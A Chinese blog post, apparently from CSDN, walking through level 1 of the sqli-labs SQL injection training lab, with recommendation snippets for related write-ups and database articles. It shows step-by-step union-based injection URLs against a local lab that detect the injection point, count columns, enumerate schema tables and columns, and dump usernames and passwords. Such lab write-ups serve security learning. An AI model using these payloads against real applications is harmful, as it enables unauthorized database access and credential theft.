SQL注入第一关-Less1

最新推荐文章于 2024-10-14 18:59:57 发布
最新推荐文章于 2024-10-14 18:59:57 发布
阅读量510 收藏 5
点赞数 18
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liyuanxiaocilang/article/details/140969566
版权

1、判断注入点类型

单引号测试

http://127.0.0.1/Less-1/?id=1'

报错,属于字符型注入,SQL语法有错误;

则在后面加上 --+

http://127.0.0.1/Less-1/?id=1' -- +

注:进行验证: 若是数字不相等依然报错

http://127.0.0.1/Less-1/?id=1' and 1=2 --+

2、判断字段数

order by 查询字段个数,逐级增加order by 后面的数字,直到报错。这里是order by到第4个字段时报错,所以证明有3个字段。

http://127.0.0.1/Less-1/?id=1' order by  4  -- +

3、使用联合查询  确定显示位置

http://127.0.0.1/Less-1/?id=1' union select 1,2,3  -- +

     由于查询语句前面是对的,所以显示前面的内容,后面的无法显示,不能确定显示位置,所以更改语句,使得前面的语句为错,显示后面的内容:

http://127.0.0.1/Less-1/?id= -1' union select 1,2,3 --+

4、确定显示位置后,查询库名

http://127.0.0.1/Less-1/?id=-1' union select 1,version(),database() --+

字段数为3,所以1在这表示占位,version()查询数据库版本,database()查询数据库库名

5、查询表名


http://192.168.162.135/sqlilab/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" --+

6、查询列名


http://127.0.0.1/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" --+

7、查询用户名和密码

http://127.0.0.1/Less-1/?id=-1' union select 1,username,password from users where id=2 --+

雷柏年
关注
SQL注入——Less-1-5(学习笔记)
xdjxi的博客
02-25 2272
第一关 1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询 2.接着尝试在id后面加上',发现页面回显不正常,表示可能存在SQL字符注入 3.输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入 4.接着使用order by 语句判断,该表中一共有几列数据 order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。5.将id=1改为一个数据库不存在的id值,如861,使用union select 1...
SQL注入sqli第四关(less-4)
s_xcx_ah的博客
06-10 1438
SQLI第四关
SQL注入sqli-labs第三关(less-3)
s_xcx_ah的博客
06-10 2392
sqli第三关简要步骤
SQL注入详解 23-28关
君莫hacker的博客
10-08 817
目录Less-23Less-24Less-25Less-26Less-27Less-28Less-29Less-30Less-31Less-32Less-33Less-34Less-35Less-36 Less-23 确定注入类型并判断显示位置 -1' union select 22,33,44 and '1'='1 查看当前数据库 -1' union select 3,database(),3 or '12'='12 爆表 -1' union select 22,group_conca
sql注入sqli-labs系列教程(less1-10)详解
wangqaz50的博客
02-03 382
<div id="article_content" class="article_content clearfix"> <link rel="stylesheet" href="https://csdnimg.cn/release/blogv2/dist/mdeditor/css/editerView/ck_htmledit_views-b5506197d8.css"> <div id="content_views" class="mar...
SQL调优指南及高级SQL技巧
Hellc007的博客
10-14 652
SQL调优是一个复杂的任务,需要对数据库结构、索引设计、查询逻辑、事务管理等多个方面的深入理解。通过运用上述高级技巧和应对实战问题的策略,可以有效提高SQL查询的性能,优化数据库的整体表现。希望这篇文章能为你的添彩。
PostgreSQL:json数据处理
m0_72560900的博客
10-11 613
在 PostgreSQL 中,处理 JSON 数据的功能非常强大,尤其是针对嵌套的 JSON 结构和 JSON 数组的查询。以下是一些处理 JSON 数据的常见操作和具体的案例,主要展示如何从 JSON 和 JSON 数组中获取指定 key 的值。
【text2sql】基于上下文文学习的MCS-SQL框架在Spider和BIRD取得了新SOTA
m0_46686599的博客
10-11 773
研究背景:大型语言模型(LLMs)在文本到SQL(Text-to-SQL)任务中,通过上下文学习(ICL)方法取得了显著的性能提升,但与人类专家相比,性能仍有较大差距,尤其是在处理复杂数据库模式和查询的基准测试中。 研究方法:本研究提出了一种新方法,利用多个提示(multiple prompts)来探索更广泛的可能答案空间,并有效聚合这些答案。通过多提示强化数据库模式链接,生成多样化的候选SQL查询,并基于置信度分数过滤这些查询,最后通过多项选择(multiple-choice selection)获取最优
sql server删除过期备份文件脚本
Winter_Sun灬的博客
10-14 216
删除sql server数据库备份文件脚本
如何在 Jupyter Notebook 执行和学习 SQL 语句(上)—— 基本原理详解和相关库安装篇
最新发布
qq_44117805的博客
10-14 678
SQLite 是一个轻量级的数据库系统,适合本地小型项目。SQLAlchemy 是一个强大的数据库连接工具,可以在Jupyter中方便地运行SQL查询。帮助有jupyter的人懒得装SQL的人学习SQL一大利器!
【PostgreSQL】运维篇——PostgreSQL 的容量规划与监控
thinking_chou的专栏
10-09 804
通过分析当前的数据库使用情况、预测未来的增长,并使用合适的监控工具,可以有效地管理数据库资源,及时发现和解决潜在问题。定期评估和调整容量规划与监控策略,可以应对不断变化的业务需求和技术环境。
SQL】深入探索SQL调优:提升数据库性能的全面指南
人生苦短,睡觉要紧,睡醒再说
10-09 1563
在本文中,我们深入探讨了SQL调优的重要性及其在提升数据库性能中的关键角色。从理解执行计划到选择合适的索引,每一个细节都能显著影响应用程序的响应速度和处理能力。我们强调了基本的优化原则,如避免使用SELECT *、合理使用JOIN,以及定期更新统计信息。同时,数据库配置和硬件优化也不可忽视,它们直接关系到系统的整体性能。通过采用这些策略和技术,开发者和数据库管理员能够有效提高数据库的效率,确保系统在高负载下依然稳定运行。
SQL之case when then用法
GDFHGFHGFH的博客
10-09 736
简单类型case sexwhen '1' then '男'when '2' then '女’else '其他' end搜索类型SELECTname,salary,CASEFROMemployees;CASE 语句是顺序敏感的,即它会从上到下评估 WHEN 子句,一旦找到第一个为真的条件,就会返回相应的结果,并忽略后面的所有条件。ELSE 子句是可选的。如果没有任何 WHEN 条件为真,并且没有提供 ELSE 子句,那么 CASE 表达式的结果将是 NULL。
【PostgreSQL 】运维篇——未来趋势:发展与社区
thinking_chou的专栏
10-10 992
PostgreSQL活跃的社区生态为用户提供了丰富的资源和支持,社区成员可以通过多种方式参与到PostgreSQL的开发和推广中。通过共同努力,PostgreSQL将继续成为一个强大、灵活和安全的数据库解决方案,满足不断变化的业务需求。
SQL第15课挑战题
m0_47482290的博客
10-09 524
1. 使用insert和指定的列,将你自己添加到customers表中。明确列出要添加哪几列,且仅需要列出你需要的列。2. 备份order表和orderitems表。
SQL】MySQL数据表命令
Frost_Descent的博客
10-11 271
这个命令通常在数据库管理系统(DBMS)的命令行界面(CLI)或者通过一些数据库管理工具(如 MySQL Workbench、phpMyAdmin 等)中使用。命令时,它会显示指定表的列名、数据类型、是否允许 NULL 值、键信息、默认值以及其他额外信息(这些信息可能会根据数据库系统的不同而有所差异)。表,这个命令会展示创建这个表时所使用的完整 SQL 语句,包括表的定义、列的数据类型、索引、约束等信息。语句用于显示创建指定表的 SQL 语句。的缩写,用于获取关于数据库表中列的信息。
九大核心 NoSQL 数据库及使用场景详解
铭毅天下Elasticsearch
10-10 953
在现代应用中,NoSQL 数据库以其灵活性、扩展性和性能优势成为各类数据存储的首选。本文基于九种 NoSQL 数据库的典型用例,详细解析它们的技术特点和应用场景。1. MongoDB - 文档存储MongoDB 是最知名的文档存储数据库,支持 BSON 格式,具有无模式设计和水平扩展能力,常用于大规模非结构化数据的存储。发布日期/公司: 2009年,由 MongoDB Inc. 发布GitHub:...
mysql学习教程,从入门到精通,SQL处理重复数据(39)
qq_45746668的博客
10-10 969
数据库管理中,数据重复是一个常见的问题。重复数据可能由于多种原因产生,如数据录入错误、数据同步问题或业务逻辑上的允许等。然而,在大多数情况下,重复数据是不希望存在的,因为它们可能导致数据不一致、查询性能下降以及数据分析错误等问题。
Dify实现text2sql工作流[SQL调用篇],并查询Postgres数据库 or Mysql数据库(docker容器)
丨汀、的博客
10-09 223
Dify实现text2sql工作流[SQL调用篇],并查询Postgres数据库 or Mysql数据库(docker容器)
sqli-labs第一关详情解答
09-14
对于sqli-labs的第一关,我们需要利用SQL注入漏洞来绕过登录验证,以下是详细解答: 1. 打开sqli-labs的网址,进入第一关页面。 2. 在登录框中输入任意用户名和密码,点击登录按钮。 3. 在跳转的页面中,我们可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值